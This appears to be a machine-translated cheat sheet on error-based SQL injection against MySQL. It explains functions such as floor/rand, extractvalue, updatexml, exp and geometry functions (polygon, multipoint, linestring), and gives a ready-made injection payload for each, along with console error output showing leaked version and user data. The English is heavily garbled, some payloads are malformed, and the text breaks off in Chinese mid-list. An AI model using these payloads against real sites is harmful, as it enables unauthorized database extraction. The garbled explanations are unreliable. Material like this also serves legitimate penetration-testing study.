1.Floor()
round () rounding to follow the original value into the specified number of decimal places, such as: round (1.45,0) =. 1; round (1.55,0) = 2
Floor () rounded down to the specified number of decimal places as: floor ( 1.45,0) =. 1; Floor (1.55,0). 1 =
ceiling () is rounded up to the specified number of decimal places as: ceiling (1.45,0) = 2; ceiling (1.55,0) = 2
floor (x), returns the largest integer less than or equal to x.
x represents concat (database (), rand (0) * 2), rand (0) 0 random seed to generate a random number between 0 and 1, * 2 generates a random number between 0-2.
Given reasons: duplicate primary keys necessary: count (), rand (), group by
payload:
id=1 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.ExtractValue()
ExtractValue(xml_frag, xpath_expr)
ExtractValue()
It accepts two string arguments, a fragment of XML tags xml_frag and an XPath expression xpath_expr (also called a locator); it returns the CDATA
text of a text node (), which is a child element node matches the element XPath expression .
The first parameter can be passed target xml file, the second parameter is represented by the search path Xpath path method
For example: SELECT ExtractValue('<a><b><b/></a>', '/a/b');
it is to find the b-node under the preceding paragraph xml document content of a node, where if Xpath syntax format clerical error, it will error. Here is the use of this feature to get what we want to know.
payload:
id=1 and extractvalue(1, concat(0x7e, (select table_name from information_schema.tables limit 1)));
3.UpdateXml()
UPDATEXML (XML_document, XPath_string, new_value);
The first argument: XML_document is String format, the name of the XML document object, the text for the Doc
The second argument: XPath_string (Xpath string format), if not understand Xpath syntax, you can find tutorials online.
The third argument: new_value, String format, replacing the data to find qualified
And our injection statement is:
id=1 and 1=(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))
Wherein the concat () function which is connected into a string, it will not conform XPATH_string format, so there is malformed burst
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
4.Exp()
exp is the exponential function with base e,
mysql> select exp(1);
+-------------------+
| exp(1) |
+-------------------+
| 2.718281828459045 |
+-------------------+
1 row in set (0.00 sec)
However, the figures are much will overflow. This function will overflow when the parameter is greater than 709, an error.
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
The 0 Bitwise will return "18446744073709551615" and return the sake of 0 Coupled with the successful execution of the function, the function will be inverted to get the maximum value of an unsigned BIGINT we will successfully executed.
mysql> select ~0;
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
We subqueries bit negated, resulting in a DOUBLE overflow error, and by thus pouring out data.
mysql> select exp(~(select * from(select database())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `x`.`database()` from (select database() AS `database()`) `x`)))'
In the scripting language, it will be wrong some of the expressions into the corresponding string, like this:
DOUBLE value is out of range in 'exp(~((select 'error_based_hpf' from dual)))'
Thus realizing the error injection.
payload:
id=1 and exp(~(select * from(select user())a));
5.GeometryCollection()
GeometryCollection understanding of: storing in a point manner, if a single point directly using the coordinates (x, y) represents, if a plurality of word lines using the points LINESTRING () to save the point on this line.
payload:
id=1 and GeometryCollection(()select *from(select user())a)b);
6.Polygon()
Polygon polygon vertices in two or more of the phase function to draw a straight line from the smell, with the current draw stroke polygonal profile, with the current brush and polygon fill mode filled polygons.
As shown in FIG:
- FIG 1 is a ring defined by the outer boundary Polygon instance.
- FIG 2 is a loop defined by the outer boundary of the inner ring and two Polygon instances. Area in the inner ring is Polygon part of an example of the outer ring.
- FIG 3 is a valid Polygon instance, because of its inner ring intersect at a single tangent point.
payload:
id =1 and polygon((select * from(select * from(select user())a)b));
This point can be appreciated that the injection point after injection to limit
7.MultiPoint
MultiPoint is a collection of zero points or more points. MultiPoint border instance is empty.
payload:
id = 1 and multipoint((select * from(select * from(select user())a)b));
8.MultiLineString()
MultiLineString zero or more geometry or geographyLineString set of instances.
As shown in FIG:
- Figure 1 shows a simple MultiLineString example, which is the boundary of two LineString four endpoints element.
- Figure 2 shows a simple MultiLineString example, because only LineString end elements intersect. Boundaries are not overlapped two endpoints.
- Figure 3 shows a simple to MultiLineString example, as one of its LineString inner element intersects appeared. This MultiLineString border instance is the four endpoints.
- FIG 4 shows a simple, non-closed MultiLineString instance.
- FIG. 5 shows a simple, non-closed a MultiLineString . It is not closed because its LineStrings element is not closed. While the simple reason that it is any LineStrings internal instances do not appear intersect.
- FIG. 6 is shown a simple, closed MultiLineString instance. It is closed because all of its elements are closed. While the simple reason that all of its elements are not found inside the intersection phenomenon.
payload:
id = 1 and multilinestring((select * from(select * from(select user())a)b));
9.LineString
LineString is a one-dimensional object that represents a series of points and the segment connecting these points.
As shown in FIG:
- FIG 1 shows a simple, non-closed LineString instance.
- Figure 2 shows a simple, non-closed LineString instance.
- FIG 3 is shown in a closed, simple LineString example, is thus a ring.
- Figure 4 shows a closure, not simple LineString instance, and therefore is not a ring.
payload:
id = 1 and LINESTRING((select * from(select * from(select user())a)b));
10.MultiPolygon()
MultiPolygon Examples of zero or more Polygon set of instances.
As shown in FIG:
- 图 1 是一个包含两个 Polygon 元素的 MultiPolygon 实例。 边界由两个外环和三个内环界定。
- 图 2 是一个包含两个 MultiPolygon 元素的 Polygon 实例。 边界由两个外环和三个内环界定。 这两个 Polygon 元素在切点处相交。